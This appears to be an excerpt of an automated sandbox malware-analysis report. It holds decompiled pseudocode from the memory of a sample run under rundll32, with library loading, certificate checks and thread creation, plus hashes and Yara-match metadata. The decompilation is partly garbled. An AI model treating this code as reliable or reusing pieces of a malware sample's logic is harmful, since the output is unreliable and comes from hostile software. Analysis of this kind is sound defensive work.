                			E000002152152060C60C(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				signed long long _t72;
				signed long long _t76;
				intOrPtr _t78;
				signed long long _t80;
				signed long long _t89;
				struct HINSTANCE__* _t94;
				signed long long _t95;
				long long _t101;
				void* _t105;
				signed long long _t109;
				signed long long _t111;
				signed long long _t114;
				struct HINSTANCE__* _t115;
				long _t118;
				void* _t121;
				WCHAR* _t123;

				 *((long long*)(_t105 + 8)) = __rbx;
				 *((long long*)(_t105 + 0x10)) = _t101;
				 *((long long*)(_t105 + 0x18)) = __rsi;
				r14d = __ecx;
				_t111 =  *0x2067c720; // 0xca1645d940e
				_t95 = _t94 | 0xffffffff;
				_t89 = _t111 ^  *(0x21520580000 + 0x102a10 + _t121 * 8);
				asm("dec eax");
				if (_t89 == _t95) goto 0x2060c78d;
				if (_t89 == 0) goto 0x2060c675;
				_t72 = _t89;
				goto 0x2060c78f;
				if (__r8 == __r9) goto 0x2060c721;
				_t78 =  *((intOrPtr*)(0x21520580000 + 0x102970 + __rsi * 8));
				if (_t78 == 0) goto 0x2060c695;
				if (_t78 == _t95) goto 0x2060c70d;
				goto 0x2060c708;
				r8d = 0x800;
				LoadLibraryExW(_t123, _t121, _t118);
				if (_t72 != 0) goto 0x2060c6d6;
				if (GetLastError() != 0x57) goto 0x2060c6d4;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t80 = _t72;
				goto 0x2060c6d6;
				if (_t80 != 0) goto 0x2060c6ef;
				 *((intOrPtr*)(0x21520580000 + 0x102970 + __rsi * 8)) = _t95;
				goto 0x2060c70d;
				_t19 = 0x21520580000 + 0x102970 + __rsi * 8;
				_t76 =  *_t19;
				 *_t19 = _t80;
				if (_t76 == 0) goto 0x2060c708;
				FreeLibrary(_t115);
				if (_t80 != 0) goto 0x2060c762;
				if (__r8 + 4 != __r9) goto 0x2060c67e;
				if (_t80 == 0) goto 0x2060c772;
				GetProcAddress(_t94);
				if (_t76 == 0) goto 0x2060c76b;
				_t109 =  *0x2067c720; // 0xca1645d940e
				asm("dec eax");
				 *(0x21520580000 + 0x102a10 + _t121 * 8) = _t76 ^ _t109;
				goto 0x2060c78f;
				goto 0x2060c723;
				_t114 =  *0x2067c720; // 0xca1645d940e
				asm("dec eax");
				 *(0x21520580000 + 0x102a10 + _t121 * 8) = _t95 ^ _t114;
				return 0;
			}



















                0x2152060c60c
                0x2152060c611
                0x2152060c616
                0x2152060c628
                0x2152060c643
                0x2152060c64a
                0x2152060c654
                0x2152060c65c
                0x2152060c662
                0x2152060c66b
                0x2152060c66d
                0x2152060c670
                0x2152060c678
                0x2152060c681
                0x2152060c68c
                0x2152060c691
                0x2152060c693
                0x2152060c6a2
                0x2152060c6a8
                0x2152060c6b4
                0x2152060c6bf
                0x2152060c6c1
                0x2152060c6c9
                0x2152060c6cf
                0x2152060c6d2
                0x2152060c6e0
                0x2152060c6e5
                0x2152060c6ed
                0x2152060c6f2
                0x2152060c6f2
                0x2152060c6f2
                0x2152060c6fd
                0x2152060c702
                0x2152060c70b
                0x2152060c714
                0x2152060c726
                0x2152060c72e
                0x2152060c737
                0x2152060c739
                0x2152060c752
                0x2152060c758
                0x2152060c760
                0x2152060c769
                0x2152060c76b
                0x2152060c77f
                0x2152060c785
                0x2152060c7ab

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: da2dcc0ebf5a72fbf061310880e0f58bfdef0c225deb5f59865ec9a74e6b18ee
                • Instruction ID: 2d9902b37e5ce6cd7effcebab56555595fea5a96e85f8f31a7b95345e91263a1
                • Opcode Fuzzy Hash: da2dcc0ebf5a72fbf061310880e0f58bfdef0c225deb5f59865ec9a74e6b18ee
                • Instruction Fuzzy Hash: A841BF33353E20C2FA359B51981C7A66297BFA8BF0F294565DD194B798DF38E4488700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205B76B0 Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Locinfo::_Lockit$GetcvtLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                • String ID:
                • API String ID: 1677860746-0
                • Opcode ID: 2a9a9126a73817e00c1239c54fc2971a4612be1ba46b2189fd7c7a0543591afa
                • Instruction ID: 3a8d6e5a0bdc1c031fea4f9bb94fe309264d7557da9462c328f5aeca6129b3ef
                • Opcode Fuzzy Hash: 2a9a9126a73817e00c1239c54fc2971a4612be1ba46b2189fd7c7a0543591afa
                • Instruction Fuzzy Hash: BC413637B46F90C9EB11DFB4D8542DC33B9EFA5788F0542569E4923AADDE34861AC340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205997A0 Relevance: 7.6, APIs: 5, Instructions: 71encryptionCOMMON
                Download Yara Rule
                C-Code - Quality: 25%
                			E00000215215205997A0(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, void* __r8) {
				void* _t55;
				long long _t57;
				long long _t58;
				long long _t60;
				long long _t63;
				void* _t71;
				void* _t72;
				void* _t74;
				void* _t75;

				_t55 = _t74;
				 *((long long*)(_t55 + 8)) = __rcx;
				_t72 = _t55 - 0x5f;
				_t75 = _t74 - 0xc0;
				 *((long long*)(_t72 + 0x37)) = 0xfffffffe;
				 *((long long*)(_t55 + 0x10)) = __rbx;
				 *((long long*)(_t55 + 0x18)) = __rdi;
				 *((long long*)(_t72 + 0x17)) = __rcx;
				 *((long long*)(_t72 + 0x1f)) = __rcx;
				 *((long long*)(_t72 + 0x27)) = __rcx;
				 *((long long*)(_t72 + 0x2f)) = __rcx;
				 *((intOrPtr*)(_t72 + 0x17)) = 0x20;
				_t63 = _t72 + 0x67;
				 *((long long*)(_t75 + 0x38)) = _t63;
				 *((long long*)(_t75 + 0x30)) = _t63;
				 *((intOrPtr*)(_t75 + 0x28)) = 0;
				 *((long long*)(_t75 + 0x20)) = _t72 + 0x17;
				r8d = 0;
				__imp__CertGetCertificateChain(_t71);
				if (__eax != 0) goto 0x2059981b;
				GetLastError();
				goto 0x205998a7;
				_t57 = __imp__CertFreeCertificateChain;
				 *((long long*)(_t72 + 0x3f)) = _t57;
				_t60 =  *((intOrPtr*)(_t72 + 0x67));
				 *((long long*)(_t72 + 0x47)) = _t60;
				 *((long long*)(_t72 - 0x19)) = _t57;
				 *((long long*)(_t72 - 0x11)) = _t57;
				 *((long long*)(_t72 - 9)) = _t57;
				 *((intOrPtr*)(_t72 - 0x19)) = 0x18;
				 *((intOrPtr*)(_t72 - 0x15)) = 2;
				 *((long long*)(_t72 - 0x29)) = _t57;
				 *((intOrPtr*)(_t72 - 0x29)) = 0x10;
				_t58 = _t72 - 0x19;
				 *((long long*)(_t72 - 0x21)) = _t58;
				 *((long long*)(_t72 - 1)) = _t58;
				 *((long long*)(_t72 + 7)) = _t58;
				 *((long long*)(_t72 + 0xf)) = _t58;
				 *((intOrPtr*)(_t72 - 1)) = 0x18;
				__imp__CertVerifyCertificateChainPolicy();
				if (0 != 0) goto 0x20599894;
				GetLastError();
				goto 0x20599897;
				if (_t60 == 0) goto 0x205998a5;
				__imp__CertFreeCertificateChain();
				return  *((intOrPtr*)(_t72 + 3));
			}












                0x215205997a0
                0x215205997a3
                0x215205997a8
                0x215205997ac
                0x215205997b3
                0x215205997bb
                0x215205997bf
                0x215205997c8
                0x215205997cc
                0x215205997d0
                0x215205997d4
                0x215205997d8
                0x215205997df
                0x215205997e3
                0x215205997ea
                0x215205997ef
                0x215205997f7
                0x21520599800
                0x21520599806
                0x2152059980e
                0x21520599810
                0x21520599816
                0x2152059981b
                0x21520599822
                0x21520599826
                0x2152059982a
                0x21520599830
                0x21520599834
                0x21520599838
                0x2152059983c
                0x21520599843
                0x2152059984a
                0x2152059984e
                0x21520599855
                0x21520599859
                0x2152059985f
                0x21520599863
                0x21520599867
                0x2152059986b
                0x21520599880
                0x21520599888
                0x2152059988a
                0x21520599892
                0x2152059989a
                0x2152059989f
                0x215205998bb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CertCertificateChain$ErrorLast$FreePolicyVerify
                • String ID:
                • API String ID: 3047530627-0
                • Opcode ID: d03ea8748dffdf280ca1bdb0017c06efe0016a6ea8ee578800e6b06a0cadf3d2
                • Instruction ID: 375315768cf9d989abb997c52ee60d06f36dc8447c54d5667b5045a0eb3cd163
                • Opcode Fuzzy Hash: d03ea8748dffdf280ca1bdb0017c06efe0016a6ea8ee578800e6b06a0cadf3d2
                • Instruction Fuzzy Hash: 0A31F073606B04CEE7608FA0E8487EC33B9F798758F044569AA8D93B88DB34D528C794
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205FACE4 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                Download Yara Rule
                C-Code - Quality: 40%
                			E00000215215205FACE4(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, char _a24, intOrPtr _a40) {
				long long _v16;
				intOrPtr _v24;
				void* _t12;
				intOrPtr* _t34;
				long long _t35;
				intOrPtr* _t38;

				_t34 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				if (__r8 != 0) goto 0x205fad14;
				_t12 = E0000021521520603944(__rax);
				 *__rax = 0x16;
				E00000215215205FAABC(_t12);
				goto 0x205fad94;
				E00000215215205FAC84(__rax, __rbx, __r8, __r9, __rcx);
				_t38 = _t34;
				if (_t34 == 0) goto 0x205fad64;
				_t35 =  &_a24;
				_v16 = _t35;
				_v24 = _a40;
				CreateThread(??, ??, ??, ??, ??, ??);
				if (_t35 != 0) goto 0x205fada4;
				E00000215215206038D4(GetLastError(), _t35, _t38);
				if (_t38 == 0) goto 0x205fad91;
				if ( *((intOrPtr*)(_t38 + 0x10)) == 0) goto 0x205fad7a;
				CloseHandle(??);
				if ( *((intOrPtr*)(_t38 + 0x18)) == 0) goto 0x205fad89;
				FreeLibrary(??);
				return E000002152152060A780(_t35, _t38);
			}









                0x215205face4
                0x215205face4
                0x215205face9
                0x215205facfb
                0x215205facfd
                0x215205fad02
                0x215205fad08
                0x215205fad0f
                0x215205fad1a
                0x215205fad1f
                0x215205fad25
                0x215205fad27
                0x215205fad2f
                0x215205fad45
                0x215205fad49
                0x215205fad55
                0x215205fad5f
                0x215205fad69
                0x215205fad72
                0x215205fad74
                0x215205fad81
                0x215205fad83
                0x215205fada3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                • String ID:
                • API String ID: 2067211477-0
                • Opcode ID: 4ff82f22711257fcade4677121f4d70aa40d09b1cab677f196644615d55f73c8
                • Instruction ID: 1adc71535c9dbef1c26233b5f3fd782b7af78050c17f9b3793ce2255e51cda8b
                • Opcode Fuzzy Hash: 4ff82f22711257fcade4677121f4d70aa40d09b1cab677f196644615d55f73c8
                • Instruction Fuzzy Hash: 86218EB7307F60C6EE25DB61E41C2EAA3A1AFE5B85F1844A0AE4943B6DDE3CD4048601
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F0A88 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 71%
                			E00007FFA7FFA535F0A88(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed char _t24;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed long long _t38;
				signed long long _t39;
				signed int* _t47;

				_a8 = __rbx;
				_a16 = __rsi;
				_t38 = _t39 & 0x0000001f;
				_t47 = _t39;
				if ((__ecx & 0x00000008) == 0) goto 0x535f0ab9;
				if (__edx >= 0) goto 0x535f0ab9;
				 *((long long*)(_t38 + 0x57ebf7e3)) =  *((long long*)(_t38 + 0x57ebf7e3)) + 1;
				asm("adc [eax+0xf], ecx");
				 *((long long*)(_t38 + 0x3cebfbe3)) =  *((long long*)(_t38 + 0x3cebfbe3)) + 1;
				_t29 = dil & 0x00000001;
				if (_t29 == 0) goto 0x535f0af0;
				asm("dec eax");
				if (_t29 >= 0) goto 0x535f0af0;
				 *((long long*)(_t38 + 0x20ebfee3)) =  *((long long*)(_t38 + 0x20ebfee3)) + 1;
				_t30 = dil & 0x00000002;
				if (_t30 == 0) goto 0x535f0b10;
				asm("dec eax");
				if (_t30 >= 0) goto 0x535f0b10;
				_t31 = dil & 0x00000010;
				if (_t31 == 0) goto 0x535f0b0d;
				 *((long long*)(_t38 - 0x9bf021d)) =  *((long long*)(_t38 - 0x9bf021d)) + 1;
				asm("invalid");
				if (_t31 == 0) goto 0x535f0b2a;
				asm("dec eax");
				if (_t31 >= 0) goto 0x535f0b2a;
				 *((long long*)(_t38 - 0x74b7101d)) =  *((long long*)(_t38 - 0x74b7101d)) + 1;
				if (_t31 == 0) goto 0x535f0b52;
				asm("rol byte [ebp+0x5c8b48db], 0x24");
				 *_t47 =  *_t47 ^ __ecx;
				asm("ror byte [eax-0x7d], 0xc4");
				 *(_t47 - 0x3d) =  *(_t47 - 0x3d) & _t24;
			}










                0x7ffa535f0a88
                0x7ffa535f0a8d
                0x7ffa535f0a9c
                0x7ffa535f0a9f
                0x7ffa535f0aa4
                0x7ffa535f0aa8
                0x7ffa535f0ab3
                0x7ffa535f0ac2
                0x7ffa535f0ace
                0x7ffa535f0ad4
                0x7ffa535f0ad8
                0x7ffa535f0ada
                0x7ffa535f0adf
                0x7ffa535f0aea
                0x7ffa535f0af0
                0x7ffa535f0af4
                0x7ffa535f0af6
                0x7ffa535f0afb
                0x7ffa535f0afd
                0x7ffa535f0b01
                0x7ffa535f0b0c
                0x7ffa535f0b12
                0x7ffa535f0b14
                0x7ffa535f0b16
                0x7ffa535f0b1b
                0x7ffa535f0b26
                0x7ffa535f0b2c
                0x7ffa535f0b30
                0x7ffa535f0b37
                0x7ffa535f0b3a
                0x7ffa535f0b3e

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction ID: 83885d8ba2104064e4ed76b75ce5aeb04fb968a19f196ac4118698f778bbb879
                • Opcode Fuzzy Hash: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction Fuzzy Hash: 951160B6E78F031DF6581368E85137D114B6FD63A8E4CE634EAAE275D68E6CA4448200
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520617C88 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 85%
                			E0000021521520617C88(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x20617cb9;
				if (__edx >= 0) goto 0x20617cb9;
				E00000215215206131F4(_t27, _t52);
				_t28 = _t27 & 0xfffffff7;
				goto 0x20617d10;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x20617cd4;
				asm("dec eax");
				if (_t43 >= 0) goto 0x20617cd4;
				E00000215215206131F4(_t28, _t52);
				_t29 = _t28 & 0xfffffffb;
				goto 0x20617d10;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x20617cf0;
				asm("dec eax");
				if (_t44 >= 0) goto 0x20617cf0;
				E00000215215206131F4(_t29, _t52);
				_t30 = _t29 & 0xfffffffe;
				goto 0x20617d10;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x20617d10;
				asm("dec eax");
				if (_t45 >= 0) goto 0x20617d10;
				if ((dil & 0x00000010) == 0) goto 0x20617d0d;
				E00000215215206131F4(_t30, _t52);
				_t31 = _t30 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x20617d2a;
				asm("dec eax");
				if (_t47 >= 0) goto 0x20617d2a;
				E00000215215206131F4(_t31, _t52);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                0x21520617c88
                0x21520617c8d
                0x21520617c9c
                0x21520617ca4
                0x21520617ca8
                0x21520617caf
                0x21520617cb4
                0x21520617cb7
                0x21520617cbe
                0x21520617cc1
                0x21520617cc3
                0x21520617cc8
                0x21520617cca
                0x21520617ccf
                0x21520617cd2
                0x21520617cd4
                0x21520617cd8
                0x21520617cda
                0x21520617cdf
                0x21520617ce6
                0x21520617ceb
                0x21520617cee
                0x21520617cf0
                0x21520617cf4
                0x21520617cf6
                0x21520617cfb
                0x21520617d01
                0x21520617d08
                0x21520617d0d
                0x21520617d10
                0x21520617d14
                0x21520617d16
                0x21520617d1b
                0x21520617d22
                0x21520617d40

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction ID: 6c42a0c9dee129186061456b97cdf236058e5d16b8296e834e4426928430ceb8
                • Opcode Fuzzy Hash: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction Fuzzy Hash: 56119133A51E75C5FE781128F48F3FAD061AFF53A0F384A94AF66067EEDA34A4414241
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205FAC10 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00000215215205FAC10(long long _a8) {
				void* _t7;
				long long _t8;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t14;

				_a8 = _t8;
				E000002152152060C3C8(_t7, _t8, _t9, _t10, _t11, _t14);
				if (_t7 != 0) goto 0x205fac2f;
				ExitThread(??);
			}









                0x215205fac10
                0x215205fac1c
                0x215205fac24
                0x215205fac28

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExitThread$ErrorLast$CloseFreeHandleLibrary
                • String ID:
                • API String ID: 3508756349-0
                • Opcode ID: 0cf7138ffa703db898d6705dbb032dcc36faa26b13de654aea811f69f9e4c263
                • Instruction ID: 9e29340884d3236fb1fb14a47b984b2f13f10734d7e9796d10489f6679209cd4
                • Opcode Fuzzy Hash: 0cf7138ffa703db898d6705dbb032dcc36faa26b13de654aea811f69f9e4c263
                • Instruction Fuzzy Hash: 2F018872302E54D7EA18EB30949C39C23A5AFE5774F201B58AE3943AEDDF3898548341
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520591900 Relevance: 7.5, APIs: 5, Instructions: 34synchronizationthreadinjectionCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
                • String ID:
                • API String ID: 3892215915-0
                • Opcode ID: 2a4119c427f675659302ac9c4084ee3897c0f4525e6df9514648f93a5a6e469d
                • Instruction ID: 090962c8b4f7d7c97ea2a18f5cf12a40cbc0c32cda0a9bfcd3ec5761c152815b
                • Opcode Fuzzy Hash: 2a4119c427f675659302ac9c4084ee3897c0f4525e6df9514648f93a5a6e469d
                • Instruction Fuzzy Hash: 48018833212E64C2EB20CB39D85965973A0FFD8B68F584141CD5E466A8DF34C059CB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205FBD10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 153COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205FBD10(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t70;
				intOrPtr _t81;
				unsigned int _t89;
				signed int _t96;
				signed int _t98;
				char _t100;
				signed int _t104;
				unsigned int _t113;
				void* _t135;
				signed int _t145;

				_t145 = __rsi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t135 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x205fbd4a;
				_t70 = E0000021521520603944(__rax);
				 *__rax = 0x16;
				E00000215215205FAABC(_t70);
				goto 0x205fbef9;
				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0x205fbd32;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x205fbef6;
				_t104 = __edi | 0xffffffff;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x205fbec3;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x205fbed8;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x205fbda0;
				_t130 =  *((char*)(__rcx + 0x41));
				goto 0x205fbda2;
				_t89 = ( *(__rcx + 0x206302b0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t89;
				if (_t89 == 8) goto 0x205fbf0e;
				_t113 = _t89;
				if (_t113 == 0) goto 0x205fbeb7;
				if (_t113 == 0) goto 0x205fbea3;
				if (_t113 == 0) goto 0x205fbe6e;
				if (_t113 == 0) goto 0x205fbe42;
				if (_t113 == 0) goto 0x205fbe3a;
				if (_t113 == 0) goto 0x205fbe0d;
				if (_t113 == 0) goto 0x205fbe00;
				if (_t89 - 0xfffffffffffffffc != 1) goto 0x205fbf1e;
				E00000215215205FCCD8( *((char*)(__rcx + 0x41)), __rcx, __rcx, __rsi, 0x206302b0);
				goto 0x205fbebf;
				E00000215215205FC73C(_t130, _t135);
				goto 0x205fbebf;
				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0x205fbe24;
				E00000215215205FB9FC(_t135, _t135, _t135 + 0x38);
				goto 0x205fbebf;
				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
				_t96 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
				_t97 =  <  ? _t104 : _t96;
				 *(_t135 + 0x38) =  <  ? _t104 : _t96;
				goto 0x205fbe6a;
				 *(_t135 + 0x38) = 0;
				goto 0x205fbec3;
				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0x205fbe4e;
				goto 0x205fbe17;
				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
				_t98 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
				 *(_t135 + 0x34) = _t98;
				if (_t98 >= 0) goto 0x205fbe6a;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
				 *(_t135 + 0x34) =  ~_t98;
				goto 0x205fbebf;
				_t81 =  *((intOrPtr*)(_t135 + 0x41));
				if (_t81 == 0x20) goto 0x205fbe9d;
				if (_t81 == 0x23) goto 0x205fbe97;
				if (_t81 == 0x2b) goto 0x205fbe91;
				if (_t81 == 0x2d) goto 0x205fbe8b;
				if (_t81 != 0x30) goto 0x205fbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000008;
				goto 0x205fbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
				goto 0x205fbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000001;
				goto 0x205fbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000020;
				goto 0x205fbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000002;
				goto 0x205fbec3;
				 *(_t135 + 0x30) = _t145;
				 *((intOrPtr*)(_t135 + 0x40)) = sil;
				 *(_t135 + 0x38) = _t104;
				 *((intOrPtr*)(_t135 + 0x3c)) = 0;
				 *((intOrPtr*)(_t135 + 0x54)) = sil;
				goto 0x205fbec3;
				if (E00000215215205FC420(_t135) == 0) goto 0x205fbf1e;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x18))));
				 *((char*)(_t135 + 0x41)) = _t100;
				if (_t100 != 0) goto 0x205fbd78;
				 *((long long*)(_t135 + 0x18)) =  *((long long*)(_t135 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t135 + 0x2c)) == 0) goto 0x205fbee3;
				if ( *((intOrPtr*)(_t135 + 0x2c)) != 7) goto 0x205fbf0e;
				 *((intOrPtr*)(_t135 + 0x470)) =  *((intOrPtr*)(_t135 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t135 + 0x470)) != 2) goto 0x205fbd6d;
				return  *((intOrPtr*)(_t135 + 0x28));
			}













                0x215205fbd10
                0x215205fbd10
                0x215205fbd15
                0x215205fbd1a
                0x215205fbd26
                0x215205fbd30
                0x215205fbd32
                0x215205fbd37
                0x215205fbd3d
                0x215205fbd45
                0x215205fbd4e
                0x215205fbd50
                0x215205fbd5d
                0x215205fbd63
                0x215205fbd6d
                0x215205fbd70
                0x215205fbd73
                0x215205fbd78
                0x215205fbd7f
                0x215205fbd8f
                0x215205fbd91
                0x215205fbd9e
                0x215205fbdad
                0x215205fbdb0
                0x215205fbdb6
                0x215205fbdbc
                0x215205fbdbe
                0x215205fbdc7
                0x215205fbdd0
                0x215205fbdd9
                0x215205fbdde
                0x215205fbde3
                0x215205fbde8
                0x215205fbded
                0x215205fbdf6
                0x215205fbdfb
                0x215205fbe03
                0x215205fbe08
                0x215205fbe11
                0x215205fbe1a
                0x215205fbe1f
                0x215205fbe24
                0x215205fbe2d
                0x215205fbe32
                0x215205fbe35
                0x215205fbe38
                0x215205fbe3a
                0x215205fbe3d
                0x215205fbe46
                0x215205fbe4c
                0x215205fbe4e
                0x215205fbe57
                0x215205fbe5a
                0x215205fbe5f
                0x215205fbe61
                0x215205fbe67
                0x215205fbe6c
                0x215205fbe6e
                0x215205fbe73
                0x215205fbe77
                0x215205fbe7b
                0x215205fbe7f
                0x215205fbe83
                0x215205fbe85
                0x215205fbe89
                0x215205fbe8b
                0x215205fbe8f
                0x215205fbe91
                0x215205fbe95
                0x215205fbe97
                0x215205fbe9b
                0x215205fbe9d
                0x215205fbea1
                0x215205fbea3
                0x215205fbea7
                0x215205fbeab
                0x215205fbeae
                0x215205fbeb1
                0x215205fbeb5
                0x215205fbec1
                0x215205fbec7
                0x215205fbec9
                0x215205fbece
                0x215205fbed4
                0x215205fbedb
                0x215205fbee1
                0x215205fbee3
                0x215205fbef0
                0x215205fbf0d

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: $*
